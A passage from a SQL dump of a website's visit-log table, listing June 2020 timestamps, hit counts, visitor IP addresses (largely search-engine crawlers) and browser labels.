1592729807,1,1,0,0,'207.46.13.26','other'),(515840,1592729840,8,8,0,0,'77.120.98.235','other'),(515841,1592730268,8,8,0,0,'185.11.82.228','other'),(515842,1592730308,2,2,0,0,'185.163.46.131','chrome'),(515843,1592731552,1,1,0,0,'130.0.55.152','chrome'),(515844,1592731554,2,2,0,0,'66.249.70.72','chrome'),(515845,1592731812,8,8,0,0,'185.11.82.228','other'),(515846,1592732477,1,1,0,0,'130.0.55.152','chrome'),(515847,1592732600,5,5,0,0,'77.111.247.181','chrome'),(515848,1592732762,8,8,0,0,'77.120.98.235','other'),(515849,1592733192,1,1,0,0,'17.58.99.7','other'),(515850,1592733323,1,1,0,0,'51.68.11.227','chrome'),(515851,1592733358,8,8,0,0,'185.11.82.228','other'),(515852,1592733744,1,1,0,0,'51.77.44.35','chrome'),(515853,1592733826,1,1,0,0,'66.249.70.72','chrome'),(515854,1592734336,1,1,0,0,'13.52.101.43','chrome'),(515855,1592734342,1,1,0,0,'54.183.181.217','chrome'),(515856,1592734343,11,11,0,0,'18.144.32.99','chrome'),(515857,1592734347,1,1,0,0,'157.55.39.193','other'),(515858,1592734843,1,1,0,0,'193.106.30.99','chrome'),(515859,1592735325,1,1,0,0,'95.152.62.118','chrome'),(515860,1592735426,2,2,0,0,'157.55.39.193','other'),(515861,1592735480,8,8,0,0,'185.11.82.228','other'),(515862,1592735801,8,8,0,0,'77.120.98.235','other'),(515863,1592736129,1,1,0,0,'130.0.55.152','chrome'),(515864,1592736449,2,2,0,0,'8.29.198.26','other'),(515865,1592736576,1,0,1,0,'66.249.70.70',''),(515866,1592736599,1,1,0,0,'109.74.154.72','chrome'),(515867,1592736831,1,1,0,0,'91.196.178.50','chrome'),(515868,1592737516,1,0,1,0,'66.249.70.69',''),(515869,1592737751,8,8,0,0,'185.11.82.228','other'),(515870,1592738096,1,1,0,0,'176.223.124.200','chrome'),(515871,1592738138,1,0,1,0,'66.249.70.72',''),(515872,1592738308,2,2,0,0,'207.46.13.26','other'),(515873,1592738687,2,2,0,0,'157.55.39.52','other'),(515874,1592738902,8,8,0,0,'77.120.98.235','other'),(515875,1592739177,1,1,0,0,'178.154.200.222','other'),(515876,1592739641,2,2,0,0,'157.55.39.52','other'),(515877,1592739882,8,8,0,0,'185.11.82.228','other'),(515878,1592741318,1,1,0,0,'207.46.13.26','other'),(515879,1592741379,3,3,0,0,'157.55.39.52','other'),(515880,1592741436,1,1,0,0,'87.236.20.17','chrome'),(515881,1592741942,2,2,0,0,'157.55.39.193','other'),(515882,1592742080,8,8,0,0,'185.11.82.228','other'),(515883,1592742239,8,8,0,0,'77.120.98.235','other'),(515884,1592742364,2,2,0,0,'157.55.39.52','other'),(515885,1592742995,1,1,0,0,'89.46.105.228','chrome'),(515886,1592743025,1,1,0,0,'81.2.195.184','chrome'),(515887,1592743179,1,1,0,0,'31.177.95.66','chrome'),(515888,1592743401,1,1,0,0,'207.46.13.185','other'),(515889,1592744227,8,8,0,0,'185.11.82.228','other'),(515890,1592745222,8,8,0,0,'77.120.98.235','other'),(515891,1592745958,1,1,0,0,'66.249.70.70','chrome'),(515892,1592745969,1,1,0,0,'157.55.39.193','other'),(515893,1592746671,8,8,0,0,'185.11.82.228','other'),(515894,1592746784,1,1,0,0,'207.46.13.185','other'),(515895,1592747272,1,1,0,0,'8.29.198.27','other'),(515896,1592747306,1,1,0,0,'8.29.198.26','other'),(515897,1592747376,1,1,0,0,'66.249.64.33','chrome'),(515898,1592747404,2,2,0,0,'66.249.70.69','chrome'),(515899,1592747462,1,1,0,0,'66.249.64.38','chrome'),(515900,1592747481,1,1,0,0,'66.249.70.72','chrome'),(515901,1592748167,1,1,0,0,'178.154.200.220','other'),(515902,1592748308,8,8,0,0,'77.120.98.235','other'),(515903,1592749136,1,1,0,0,'157.55.39.193','other'),(515904,1592749204,8,8,0,0,'185.11.82.228','other'),(515905,1592749239,2,2,0,0,'207.46.13.26','other'),(515906,1592750427,1,1,0,0,'77.222.147.198','chrome'),(515907,1592750873,2,2,0,0,'207.46.13.185','other'),(515908,1592751021,1,1,0,0,'73.74.39.238','chrome'),(515909,1592751531,8,8,0,0,'185.11.82.228','other'),(515910,1592751564,1,1,0,0,'66.249.70.70','chrome'),(515911,1592751652,8,8,0,0,'77.120.98.235','other'),(515912,1592751701,1,1,0,0,'157.55.39.193','other'),(515913,1592751968,1,1,0,0,'157.55.39.52','other'),(515914,1592752474,1,1,0,0,'66.249.70.70','chrome'),(515915,1592752642,1,1,0,0,'157.55.39.193','other'),(515916,1592753500,1,1,0,0,'3.220.157.99','chrome'),(515917,1592754091,8,8,0,0,'185.11.82.228','other'),(515918,1592754801,8,8,0,0,'77.120.98.235','other'),(515919,1592754931,1,1,0,0,'157.55.39.52','other'),(515920,1592756240,1,1,0,0,'207.46.13.185','other'),(515921,1592756337,1,1,0,0,'157.55.39.52','other'),(515922,1592756545,8,8,0,0,'185.11.82.228','other'),(515923,1592756788,2,2,0,0,'45.199.109.202','chrome'),(515924,1592757086,1,1,0,0,'91.206.31.132','chrome'),(515925,1592757208,1,1,0,0,'66.249.70.69','chrome'),(515926,1592757857,8,8,0,0,'77.120.98.235','other'),(515927,1592758096,2,2,0,0,'8.29.198.26','other'),(515928,1592758444,1,1,0,0,'84.17.49.199','chrome'),(515929,1592758887,8,8,0,0,'185.11.82.228','other'),(515930,1592760486,1,1,0,0,'66.249.70.69','chrome'),(515931,1592760959,8,8,0,0,'77.120.98.235','other'),(515932,1592761328,1,1,0,0,'17.58.99.7','other'),(515933,1592761372,8,8,0,0,'185.11.82.228','other'),(515934,1592761455,2,2,0,0,'154.90.68.38','chrome'),(515935,1592761457,1,1,0,0,'51.68.11.215','chrome'),(515936,1592761486,1,1,0,0,'157.55.39.52','other'),(515937,1592761491,1,1,0,0,'45.199.109.202','chrome'),(515938,1592762262,1,1,0,0,'31.177.95.140','chrome'),(515939,1592763370,2,2,0,0,'66.249.70.72','chrome'),(515940,1592763387,1,1,0,0,'157.55.39.52','other'),(515941,1592763481,1,1,0,0,'207.46.13.185','other'),(515942,1592763686,2,2,0,0,'66.249.70.69','chrome'),(515943,1592763935,8,8,0,0,'185.11.82.228','other'),(515944,1592763945,1,1,0,0,'66.249.64.33','chrome'),(515945,1592764177,8,8,0,0,'77.120.98.235','other'),(515946,1592764357,2,2,0,0,'66.249.70.70','chrome'),(515947,1592764596,1,1,0,0,'66.249.70.72','chrome'),(515948,1592765174,1,1,0,0,'157.55.39.193','other'),(515949,1592765535,1,1,0,0,'66.249.70.69','chrome'),(515950,1592766611,1,1,0,0,'207.46.13.79','other'),(515951,1592766816,8,8,0,0,'185.11.82.228','other'),(515952,1592767604,8,8,0,0,'77.120.98.235','other'),(515953,1592767921,1,1,0,0,'178.154.200.222','other'),(515954,1592768264,1,1,0,0,'207.46.13.185','other'),(515955,1592768290,1,1,0,0,'157.55.39.193','other'),(515956,1592768920,1,1,0,0,'8.29.198.26','other'),(515957,1592768958,1,1,0,0,'8.29.198.27','other'),(515958,1592769606,1,1,0,0,'91.196.178.39','chrome'),(515959,1592769676,8,8,0,0,'185.11.82.228','other'),(515960,1592771169,1,0,1,0,'66.249.70.69',''),(515961,1592771180,8,8,0,0,'77.120.98.235','other'),(515962,1592772190,1,1,0,0,'178.154.200.87','other'),(515963,1592772471,1,1,0,0,'66.249.70.70','chrome'),(515964,1592772508,1,1,0,0,'207.46.13.26','other'),(515965,1592772586,8,8,0,0,'185.11.82.228','other'),(515966,1592772833,1,1,0,0,'193.106.30.99','firefox'),(515967,1592772989,1,1,0,0,'66.249.70.72','chrome'),(515968,1592773275,3,3,0,0,'157.55.39.52','other'),(515969,1592773783,1,1,0,0,'207.46.13.79','other'),(515970,1592773789,2,2,0,0,'207.46.13.185','other'),(515971,1592774868,8,8,0,0,'77.120.98.235','other'),(515972,1592775119,1,1,0,0,'149.28.224.58','other'),(515973,1592775469,8,8,0,0,'185.11.82.228','other'),(515974,1592775568,2,2,0,0,'157.55.39.52','other'),(515975,1592776278,1,1,0,0,'207.46.13.79','other'),(515976,1592776585,1,1,0,0,'178.154.200.97','other'),(515977,1592776831,2,2,0,0,'157.55.39.52','other'),(515978,1592777427,1,1,0,0,'207.46.13.185','other'),(515979,1592777547,1,1,0,0,'157.55.39.193','other'),(515980,1592778366,8,8,0,0,'185.11.82.228','other'),(515981,1592778479,2,2,0,0,'157.55.39.52','other'),(515982,1592778515,8,8,0,0,'77.120.98.235','other'),(515983,1592778649,1,1,0,0,'213.180.203.16','other'),(515984,1592779578,1,1,0,0,'157.55.39.193','other'),(515985,1592779741,1,1,0,0,'8.29.198.26','other'),(515986,1592779785,1,1,0,0,'8.29.198.25','other'),(515987,1592780473,1,1,0,0,'178.154.200.222','other'),(515988,1592781480,8,8,0,0,'185.11.82.228','other'),(515989,1592781497,1,1,0,0,'157.55.39.52','other'),(515990,1592782110,8,8,0,0,'77.120.98.235','other'),(515991,1592782428,1,1,0,0,'66.249.70.69','chrome'),(515992,1592782936,1,1,0,0,'17.58.99.7','other'),(515993,1592783538,1,1,0,0,'157.55.39.193','other'),(515994,1592783706,1,1,0,0,'62.205.134.182','other'),(515995,1592783798,1,1,0,0,'66.249.70.70','chrome'),(515996,1592784392,8,8,0,0,'185.11.82.228','other'),(515997,1592785029,1,1,0,0,'207.46.13.79','other'),(515998,1592785332,1,1,0,0,'66.249.70.69','chrome'),(515999,1592786040,8,8,0,0,'77.120.98.235','other'),(516000,1592786177,1,1,0,0,'178.154.200.222','other'),(516001,1592786839,1,1,0,0,'66.249.64.36','chrome'),(516002,1592786894,1,0,1,0,'66.249.70.70',''),(516003,1592787253,8,8,0,0,'185.11.82.228','other'),(516004,1592787478,1,1,0,0,'66.249.70.70','chrome'),(516005,1592787517,2,2,0,0,'66.249.70.69','chrome'),(516006,1592787756,1,1,0,0,'17.58.99.7','other'),(516007,1592788068,1,1,0,0,'207.46.13.79','other'),(516008,1592788342,1,1,0,0,'207.46.13.185','other'),(516009,1592788783,1,1,0,0,'157.55.39.52','other'),(516010,1592789004,1,1,0,0,'66.249.70.69','chrome'),(516011,1592789345,1,1,0,0,'157.55.39.193','other'),(516012,1592790203,1,1,0,0,'178.154.200.222','other'),(516013,1592790362,8,8,0,0,'185.11.82.228','other'),(516014,1592790571,2,2,0,0,'8.29.198.26','other'),(516015,1592790997,8,8,0,0,'77.120.98.235','other'),(516016,1592791030,1,1,0,0,'66.249.70.70','chrome'),(516017,1592791559,1,1,0,0,'207.46.13.79','other'),(516018,1592792267,1,1,0,0,'66.249.64.38','chrome'),(516019,1592793133,2,2,0,0,'207.46.13.185','other'),(516020,1592793465,8,8,0,0,'185.11.82.228','other'),(516021,1592793794,1,1,0,0,'157.55.39.52','other'),(516022,1592793829,1,1,0,0,'66.249.70.69','chrome'),(516023,1592794246,1,1,0,0,'157.55.39.193','other'),(516024,1592795021,1,1,0,0,'178.154.200.119','other'),(516025,1592796083,2,2,0,0,'157.55.39.193','other'),(516026,1592796119,1,1,0,0,'66.249.70.69','chrome'),(516027,1592796157,1,1,0,0,'66.249.70.70','chrome'),(516028,1592796214,8,8,0,0,'77.120.98.235','other'),(516029,1592796440,8,8,0,0,'185.11.82.228','other'),(516030,1592796800,1,1,0,0,'157.55.39.52','other'),(516031,1592797931,1,1,0,0,'66.249.64.33','chrome'),(516032,1592797959,1,1,0,0,'66.249.70.69','chrome'),(516033,1592798615,1,1,0,0,'46.203.6.55','chrome'),(516034,1592799083,2,2,0,0,'157.55.39.52','other'),(516035,1592799221,1,1,0,0,'207.46.13.185','other'),(516036,1592799492,2,2,0,0,'66.249.70.70','chrome'),(516037,1592799709,8,8,0,0,'185.11.82.228','other'),(516038,1592799866,1,1,0,0,'66.249.64.33','chrome'),(516039,1592800367,1,1,0,0,'194.61.24.94','other'),(516040,1592800588,1,1,0,0,'157.55.39.52','other'),(516041,1592801023,1,1,0,0,'46.211.8.148','chrome'),(516042,1592801102,8,8,0,0,'77.120.98.235','other'),(516043,1592801399,1,1,0,0,'8.29.198.26','other'),(516044,1592801443,1,1,0,0,'8.29.198.27','other'),(516045,1592801477,1,1,0,0,'62.205.134.182','other'),(516046,1592801687,1,1,0,0,'66.249.64.33','chrome'),(516047,1592801706,1,1,0,0,'66.249.70.72','chrome'),(516048,1592801998,1,1,0,0,'157.55.39.104','other'),(516049,1592802348,2,2,0,0,'66.249.70.69','chrome'),(516050,1592802971,8,8,0,0,'185.11.82.228','other'),(516051,1592803165,1,1,0,0,'17.58.99.7','other'),(516052,1592803167,2,2,0,0,'157.55.39.52','other'),(516053,1592803182,2,2,0,0,'66.249.64.36','chrome'),(516054,1592804078,1,1,0,0,'178.154.200.216','other'),(516055,1592804407,2,2,0,0,'91.196.178.183','chrome'),(516056,1592804780,1,1,0,0,'91.196.178.79','chrome'),(516057,1592804907,2,2,0,0,'66.249.70.72','chrome'),(516058,1592804926,1,1,0,0,'66.249.70.70','chrome'),(516059,1592805748,8,8,0,0,'77.120.98.235','other'),(516060,1592806282,8,8,0,0,'185.11.82.228','other'),(516061,1592806680,1,1,0,0,'66.249.70.72','chrome'),(516062,1592807372,2,2,0,0,'94.153.3.240','chrome'),(516063,1592807864,2,2,0,0,'66.249.70.70','chrome'),(516064,1592808013,1,1,0,0,'66.249.70.72','chrome'),(516065,1592808023,1,1,0,0,'66.249.70.69','chrome'),(516066,1592808820,1,1,0,0,'178.154.200.97','other'),(516067,1592808834,1,1,0,0,'178.154.200.92','other'),(516068,1592808849,1,1,0,0,'178.154.200.112','other'),(516069,1592808963,4,4,0,0,'66.249.70.69','chrome'),(516070,1592809001,1,1,0,0,'94.179.147.128','chrome'),(516071,1592809025,2,2,0,0,'66.249.70.70','chrome'),(516072,1592809449,1,1,0,0,'91.196.178.79','chrome'),(516073,1592810093,8,8,0,0,'185.11.82.228','other'),(516074,1592810142,1,1,0,0,'91.196.177.229','chrome'),(516075,1592810230,1,1,0,0,'198.16.66.197','chrome'),(516076,1592810589,5,5,0,0,'66.249.70.69','chrome'),(516077,1592810650,2,2,0,0,'157.55.39.104','other'),(516078,1592810662,1,1,0,0,'66.249.70.70','chrome'),(516079,1592810683,2,2,0,0,'66.249.64.33','chrome'),(516080,1592810711,1,1,0,0,'157.55.39.193','other'),(516081,1592811088,8,8,0,0,'77.120.98.235','other'),(516082,1592811470,1,1,0,0,'91.196.178.21','chrome'),(516083,1592811596,1,1,0,0,'131.220.6.152','chrome'),(516084,1592812217,2,2,0,0,'66.249.70.69','chrome'),(516085,1592812229,1,1,0,0,'8.29.198.25','other'),(516086,1592812275,1,1,0,0,'8.29.198.27','other'),(516087,1592812728,1,1,0,0,'157.55.39.193','other'),(516088,1592813073,1,1,0,0,'66.249.70.70','chrome'),(516089,1592813302,1,1,0,0,'66.249.70.69','chrome'),(516090,1592813389,4,4,0,0,'66.249.70.72','chrome'),(516091,1592813470,1,1,0,0,'66.249.64.36','chrome'),(516092,1592814145,2,2,0,0,'66.249.64.33','chrome'),(516093,1592814200,8,8,0,0,'185.11.82.228','other'),(516094,1592814836,3,3,0,0,'66.249.70.69','chrome'),(516095,1592815172,1,1,0,0,'66.249.70.70','chrome'),(516096,1592815305,3,3,0,0,'66.249.70.72','chrome'),(516097,1592815849,1,1,0,0,'66.249.64.36','chrome'),(516098,1592815985,1,1,0,0,'66.249.70.69','chrome'),(516099,1592816488,1,1,0,0,'66.249.70.70','chrome'),(516100,1592816627,8,8,0,0,'77.120.98.235','other'),(516101,1592817219,2,2,0,0,'66.249.70.72','chrome'),(516102,1592818155,8,8,0,0,'185.11.82.228','other'),(516103,1592818532,4,4,0,0,'66.249.70.69','chrome'),(516104,1592818685,2,2,0,0,'66.249.70.70','chrome'),(516105,1592819001,1,1,0,0,'66.249.64.38','chrome'),(516106,1592819102,1,1,0,0,'66.249.70.72','chrome'),(516107,1592819104,1,1,0,0,'17.58.99.7','other'),(516108,1592819291,1,1,0,0,'157.55.39.193','other'),(516109,1592819476,2,2,0,0,'91.196.177.1','chrome'),(516110,1592819594,1,1,0,0,'46.174.125.28','chrome'),(516111,1592819655,1,1,0,0,'66.249.64.33','chrome'),(516112,1592820176,1,1,0,0,'3.23.104.77','chrome'),(516113,1592820612,3,3,0,0,'66.249.70.69','chrome'),(516114,1592820649,2,2,0,0,'66.249.70.70','chrome'),(516115,1592820904,1,1,0,0,'66.249.70.72','chrome'),(516116,1592821942,2,2,0,0,'91.196.178.52','chrome'),(516117,1592821990,2,2,0,0,'66.249.70.72','chrome'),(516118,1592822176,1,1,0,0,'66.249.64.38','chrome'),(516119,1592822210,8,8,0,0,'185.11.82.228','other'),(516120,1592822254,8,8,0,0,'77.120.98.235','other'),(516121,1592822406,1,1,0,0,'66.249.70.70','chrome'),(516122,1592822486,1,1,0,0,'109.74.154.72','chrome'),(516123,1592822666,3,3,0,0,'66.249.70.69','chrome'),(516124,1592823022,1,1,0,0,'91.196.178.169','chrome'),(516125,1592823053,1,1,0,0,'8.29.198.25','other'),(516126,1592823100,1,1,0,0,'8.29.198.26','other'),(516127,1592823592,1,1,0,0,'66.249.70.72','chrome'),(516128,1592823807,3,3,0,0,'66.249.70.70','chrome'),(516129,1592823884,1,1,0,0,'66.249.64.33','chrome'),(516130,1592824211,1,1,0,0,'91.196.178.52','chrome'),(516131,1592824265,1,1,0,0,'91.242.54.79','chrome'),(516132,1592824829,1,1,0,0,'51.77.52.160','chrome'),(516133,1592824847,1,1,0,0,'157.55.39.104','other'),(516134,1592824849,1,1,0,0,'66.249.70.72','chrome'),(516135,1592825157,1,1,0,0,'157.55.39.52','other'),(516136,1592825429,4,4,0,0,'66.249.70.70','chrome'),(516137,1592825579,2,2,0,0,'66.249.70.69','chrome'),(516138,1592825930,1,1,0,0,'66.249.70.72','chrome'),(516139,1592826321,2,2,0,0,'66.249.64.38','chrome'),(516140,1592826434,1,1,0,0,'157.55.39.193','other'),(516141,1592826451,1,1,0,0,'91.196.178.89','chrome'),(516142,1592826507,1,1,0,0,'66.249.70.70','chrome'),(516143,1592826551,1,1,0,0,'66.249.64.36','chrome'),(516144,1592827006,8,8,0,0,'185.11.82.228','other'),(516145,1592827136,8,8,0,0,'77.120.98.235','other'),(516146,1592827637,1,1,0,0,'66.249.64.38','chrome'),(516147,1592827707,1,1,0,0,'157.55.39.52','other'),(516148,1592827773,2,1,1,0,'66.249.70.72',''),(516149,1592827783,1,1,0,0,'66.249.70.70','chrome'),(516150,1592827908,2,2,0,0,'66.249.70.69','chrome'),(516151,1592828274,1,1,0,0,'66.249.64.33','chrome'),(516152,1592829253,1,1,0,0,'66.249.70.69','chrome'),(516153,1592829385,4,4,0,0,'66.249.70.70','chrome'),(516154,1592829524,2,2,0,0,'66.249.70.72','chrome'),(516155,1592829577,1,1,0,0,'31.13.127.3','other'),(516156,1592829579,1,1,0,0,'31.13.127.6','other'),(516157,1592829940,1,1,0,0,'213.180.203.70','other'),(516158,1592829965,3,3,0,0,'157.55.39.104','other'),(516159,1592830258,2,2,0,0,'66.249.70.69','chrome'),(516160,1592830360,1,1,0,0,'213.180.203.95','other'),(516161,1592830633,1,1,0,0,'95.134.185.225','chrome'),(516162,1592831296,1,1,0,0,'185.190.149.98','other'),(516163,1592831386,2,2,0,0,'66.249.70.72','chrome'),(516164,1592831436,1,1,0,0,'91.196.178.183','chrome'),(516165,1592831654,2,2,0,0,'66.249.70.70','chrome'),(516166,1592832034,2,2,0,0,'66.249.70.69','chrome'),(516167,1592832209,1,1,0,0,'157.55.39.52','other'),(516168,1592832354,1,1,0,0,'213.180.203.17','other'),(516169,1592832471,2,2,0,0,'18.236.214.105','chrome'),(516170,1592832478,1,1,0,0,'192.33.90.80','chrome'),(516171,1592832545,1,1,0,0,'157.55.39.193','other'),(516172,1592832635,8,8,0,0,'77.120.98.235','other'),(516173,1592832638,8,8,0,0,'185.11.82.228','other'),(516174,1592832901,1,1,0,0,'66.249.70.70','chrome'),(516175,1592833810,2,2,0,0,'66.249.70.72','chrome'),(516176,1592833830,1,1,0,0,'178.154.200.175','other'),(516177,1592833886,1,1,0,0,'8.29.198.27','other'),(516178,1592833924,1,1,0,0,'8.29.198.25','other'),(516179,1592834677,2,2,0,0,'66.249.70.70','chrome'),(516180,1592835395,1,1,0,0,'66.249.70.69','chrome'),(516181,1592835707,1,1,0,0,'185.15.56.22','other'),(516182,1592836096,1,1,0,0,'66.249.64.33','chrome'),(516183,1592836772,4,4,0,0,'66.249.70.69','chrome'),(516184,1592836959,1,0,1,0,'66.249.70.72',''),(516185,1592837151,1,1,0,0,'91.196.176.13','chrome'),(516186,1592837433,1,1,0,0,'66.249.64.38','chrome'),(516187,1592837640,1,1,0,0,'178.154.200.97','other'),(516188,1592837841,3,3,0,0,'66.249.70.70','chrome'),(516189,1592837944,1,1,0,0,'66.249.70.69','chrome'),(516190,1592838191,8,8,0,0,'185.11.82.228','other'),(516191,1592838257,8,8,0,0,'77.120.98.235','other'),(516192,1592838440,1,1,0,0,'157.55.39.52','other'),(516193,1592838553,2,2,0,0,'66.249.70.72','chrome'),(516194,1592838755,1,1,0,0,'66.249.70.70','chrome'),(516195,1592838765,1,1,0,0,'66.249.64.36','chrome'),(516196,1592838930,1,1,0,0,'91.196.178.145','chrome'),(516197,1592839419,1,1,0,0,'66.249.64.38','chrome'),(516198,1592839555,2,2,0,0,'66.249.70.69','chrome'),(516199,1592840193,1,1,0,0,'213.180.203.16','other'),(516200,1592840217,2,2,0,0,'66.249.70.72','chrome'),(516201,1592840683,1,1,0,0,'66.249.64.38','chrome'),(516202,1592840735,5,5,0,0,'66.249.70.70','chrome'),(516203,1592840832,1,1,0,0,'66.249.64.36','chrome'),(516204,1592841268,1,1,0,0,'35.205.31.203','other'),(516205,1592841534,1,1,0,0,'66.249.70.72','chrome'),(516206,1592841881,2,2,0,0,'157.55.39.52','other'),(516207,1592842131,3,3,0,0,'66.249.70.70','chrome'),(516208,1592842240,1,1,0,0,'66.249.64.38','chrome'),(516209,1592842475,1,1,0,0,'157.55.39.193','other'),(516210,1592842855,2,2,0,0,'66.249.70.72','chrome'),(516211,1592842879,1,1,0,0,'17.58.99.7','other'),(516212,1592843043,2,2,0,0,'66.249.64.23','chrome'),(516213,1592843464,1,1,0,0,'157.55.39.52','other'),(516214,1592843724,8,8,0,0,'185.11.82.228','other'),(516215,1592843765,8,8,0,0,'77.120.98.235','other'),(516216,1592844001,1,1,0,0,'207.46.13.13','other'),(516217,1592844067,2,2,0,0,'66.249.64.25','chrome'),(516218,1592844451,1,1,0,0,'35.241.241.144','chrome'),(516219,1592844599,1,1,0,0,'157.55.39.193','other'),(516220,1592844703,1,1,0,0,'66.249.64.23','chrome'),(516221,1592844715,1,1,0,0,'8.29.198.27','other'),(516222,1592844749,1,1,0,0,'66.249.70.33','chrome'),(516223,1592844758,1,1,0,0,'8.29.198.26','other'),(516224,1592845004,1,1,0,0,'207.46.13.210','other'),(516225,1592845163,2,2,0,0,'66.249.70.72','chrome'),(516226,1592845229,3,3,0,0,'66.249.70.69','chrome'),(516227,1592845409,2,2,0,0,'66.249.64.36','chrome'),(516228,1592845631,2,2,0,0,'207.46.13.13','other'),(516229,1592845825,2,2,0,0,'207.46.13.177','other'),(516230,1592846398,5,5,0,0,'66.249.70.70','chrome'),(516231,1592846627,1,1,0,0,'207.46.13.13','other'),(516232,1592846632,1,1,0,0,'157.55.39.193','other'),(516233,1592846659,1,1,0,0,'157.55.39.52','other'),(516234,1592846874,3,3,0,0,'66.249.64.36','chrome'),(516235,1592847249,3,3,0,0,'66.249.70.72','chrome'),(516236,1592847274,5,5,0,0,'66.249.70.69','chrome'),(516237,1592847336,1,1,0,0,'66.249.64.38','chrome'),(516238,1592847688,2,2,0,0,'66.249.70.70','chrome'),(516239,1592848048,1,1,0,0,'157.55.39.52','other'),(516240,1592848307,2,2,0,0,'157.55.39.193','other'),(516241,1592849079,7,7,0,0,'66.249.70.70','chrome'),(516242,1592849246,1,1,0,0,'37.54.18.5','chrome'),(516243,1592849261,2,2,0,0,'66.249.70.69','chrome'),(516244,1592849330,3,3,0,0,'66.249.64.36','chrome'),(516245,1592849445,1,1,0,0,'66.249.64.38','chrome'),(516246,1592849456,8,8,0,0,'185.11.82.228','other'),(516247,1592849458,8,8,0,0,'77.120.98.235','other'),(516248,1592849480,1,1,0,0,'66.249.64.33','chrome'),(516249,1592849487,3,3,0,0,'66.249.70.72','chrome'),(516250,1592849677,1,1,0,0,'157.55.39.52','other'),(516251,1592850317,1,1,0,0,'178.154.200.22','other'),(516252,1592850492,1,1,0,0,'192.33.90.80','chrome'),(516253,1592850513,3,3,0,0,'66.249.70.70','chrome'),(516254,1592850595,1,1,0,0,'157.55.39.52','other'),(516255,1592850973,2,2,0,0,'66.249.64.33','chrome'),(516256,1592851006,2,2,0,0,'66.249.70.69','chrome'),(516257,1592851169,2,2,0,0,'66.249.70.72','chrome'),(516258,1592851594,1,1,0,0,'207.46.13.13','other'),(516259,1592852170,2,2,0,0,'66.249.70.70','chrome'),(516260,1592852185,4,4,0,0,'66.249.70.69','chrome'),(516261,1592852321,1,1,0,0,'66.249.64.38','chrome'),(516262,1592852743,1,1,0,0,'66.249.64.36','chrome'),(516263,1592852861,1,1,0,0,'66.249.70.72','chrome'),(516264,1592853150,3,3,0,0,'66.249.70.69','chrome'),(516265,1592853157,1,1,0,0,'157.55.39.193','other'),(516266,1592853376,1,1,0,0,'207.46.13.177','other'),(516267,1592853559,2,1,1,0,'66.249.70.70',''),(516268,1592853694,1,1,0,0,'157.55.39.52','other'),(516269,1592853968,3,3,0,0,'66.249.70.70','chrome'),(516270,1592854275,2,2,0,0,'66.249.70.69','chrome'),(516271,1592854666,1,1,0,0,'37.73.106.110','chrome'),(516272,1592854672,1,1,0,0,'66.249.70.72','chrome'),(516273,1592854686,1,1,0,0,'157.55.39.52','other'),(516274,1592855044,2,2,0,0,'66.249.70.70','chrome'),(516275,1592855187,1,1,0,0,'66.249.64.36','chrome'),(516276,1592855204,2,2,0,0,'66.249.70.69','chrome'),(516277,1592855541,2,2,0,0,'8.29.198.27','other'),(516278,1592855747,1,1,0,0,'207.46.13.13','other'),(516279,1592855838,1,1,0,0,'178.154.200.222','other'),(516280,1592855980,8,8,0,0,'77.120.98.235','other'),(516281,1592855995,8,8,0,0,'185.11.82.228','other'),(516282,1592856283,4,4,0,0,'66.249.70.72','chrome'),(516283,1592856371,2,2,0,0,'66.249.70.69','chrome'),(516284,1592856425,1,1,0,0,'66.249.70.70','chrome'),(516285,1592856851,1,1,0,0,'17.58.99.7','other'),(516286,1592857062,1,1,0,0,'207.46.13.177','other'),(516287,1592857567,4,4,0,0,'66.249.70.70','chrome'),(516288,1592857794,1,1,0,0,'66.249.70.69','chrome'),(516289,1592858143,2,2,0,0,'66.249.64.36','chrome'),(516290,1592858357,2,2,0,0,'95.213.141.126','opera'),(516291,1592858658,1,1,0,0,'66.249.70.72','chrome'),(516292,1592859736,2,2,0,0,'66.249.70.72','chrome'),(516293,1592859777,3,3,0,0,'66.249.64.33','chrome'),(516294,1592859914,2,2,0,0,'66.249.64.36','chrome'),(516295,1592860127,2,2,0,0,'66.249.70.69','chrome'),(516296,1592860300,2,2,0,0,'66.249.70.70','chrome'),(516297,1592860725,1,1,0,0,'66.249.70.72','chrome'),(516298,1592861249,1,1,0,0,'157.55.39.52','other'),(516299,1592862047,2,2,0,0,'66.249.70.72','chrome'),(516300,1592862379,3,3,0,0,'66.249.70.70','chrome'),(516301,1592862924,8,8,0,0,'77.120.98.235','other'),(516302,1592862950,1,1,0,0,'157.55.39.193','other'),(516303,1592862988,1,1,0,0,'66.249.64.33','chrome'),(516304,1592863158,4,4,0,0,'66.249.70.69','chrome'),(516305,1592863220,8,8,0,0,'185.11.82.228','other'),(516306,1592863464,2,2,0,0,'66.249.70.70','chrome'),(516307,1592863489,2,2,0,0,'207.46.13.13','other'),(516308,1592864210,2,2,0,0,'66.249.70.69','chrome'),(516309,1592864454,2,1,1,0,'66.249.70.70',''),(516310,1592865116,4,4,0,0,'66.249.70.72','chrome'),(516311,1592865167,2,2,0,0,'66.249.70.70','chrome'),(516312,1592865428,1,1,0,0,'66.249.64.36','chrome'),(516313,1592865542,1,1,0,0,'207.46.13.13','other'),(516314,1592865546,1,1,0,0,'157.55.39.52','other'),(516315,1592865678,1,1,0,0,'66.249.64.33','chrome'),(516316,1592866349,1,1,0,0,'178.154.200.112','other'),(516317,1592866370,1,1,0,0,'8.29.198.25','other'),(516318,1592866411,1,1,0,0,'8.29.198.27','other'),(516319,1592866606,1,1,0,0,'178.154.200.222','other'),(516320,1592866722,1,1,0,0,'66.249.64.38','chrome'),(516321,1592867183,2,2,0,0,'66.249.70.69','chrome'),(516322,1592867449,2,2,0,0,'157.55.39.193','other'),(516323,1592867680,1,1,0,0,'207.46.13.177','other'),(516324,1592868128,1,1,0,0,'66.249.70.72','chrome'),(516325,1592868174,22,22,0,0,'66.249.70.69','chrome'),(516326,1592868215,5,5,0,0,'66.249.70.70','chrome'),(516327,1592869933,8,8,0,0,'77.120.98.235','other'),(516328,1592869959,1,1,0,0,'178.154.200.196','other'),(516329,1592870107,1,1,0,0,'62.205.134.182','other'),(516330,1592870115,3,3,0,0,'66.249.70.69','chrome'),(516331,1592870307,1,1,0,0,'66.249.70.70','chrome'),(516332,1592870637,2,2,0,0,'66.249.70.72','chrome'),(516333,1592870690,2,2,0,0,'66.249.64.33','chrome'),(516334,1592870975,1,1,0,0,'66.249.64.38','chrome'),(516335,1592871087,8,8,0,0,'185.11.82.228','other'),(516336,1592871507,1,1,0,0,'157.55.39.193','other'),(516337,1592871556,2,2,0,0,'66.249.70.70','chrome'),(516338,1592871837,2,2,0,0,'192.35.168.216','other'),(516339,1592872078,1,1,0